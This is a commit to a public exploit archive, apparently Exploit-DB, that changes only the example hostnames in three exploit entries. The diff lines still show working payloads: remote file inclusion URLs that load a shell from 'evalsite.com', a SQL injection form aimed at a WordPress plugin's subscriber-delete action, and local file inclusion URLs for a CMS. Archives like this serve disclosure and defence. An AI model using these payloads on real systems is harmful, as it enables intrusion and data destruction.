DB: 2016-09-04

This commit is contained in:
Offensive Security 2016-09-04 05:08:08 +00:00
parent 5e2fc10125
commit b2749125b0
4 changed files with 2187 additions and 2187 deletions

4362
files.csv

File diff suppressed because it is too large Load diff

View file

@ -13,8 +13,8 @@ BaseLoader.php
BaseView.php
ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
# milw0rm.com [2006-08-10]

View file

@ -7,7 +7,7 @@ Exploiting this issue could allow an attacker to compromise the application, acc
G-Lock Double Opt-in Manager 2.6.2 and prior versions are vulnerable.
<html>
<form method="post" action="http://myserver/wp-admin/admin-ajax.php">
<form method="post" action="http://server/wp-admin/admin-ajax.php">
<input type="text" name="action" value="gsom_aj_delete_subscriber">
<input type="text" name="json" value="["intId or 1=1"]">
<input type="text" name="_" value="">

View file

@ -15,8 +15,8 @@ artmedic-cms.de
PoC:
http://www.sito.com/cms/index.php?page=[LFI]
http://www.sito.com/index.php?page=[LFI]
http://server/cms/index.php?page=[LFI]
http://server/index.php?page=[LFI]
d0rK:
CMS von artmedic webdesign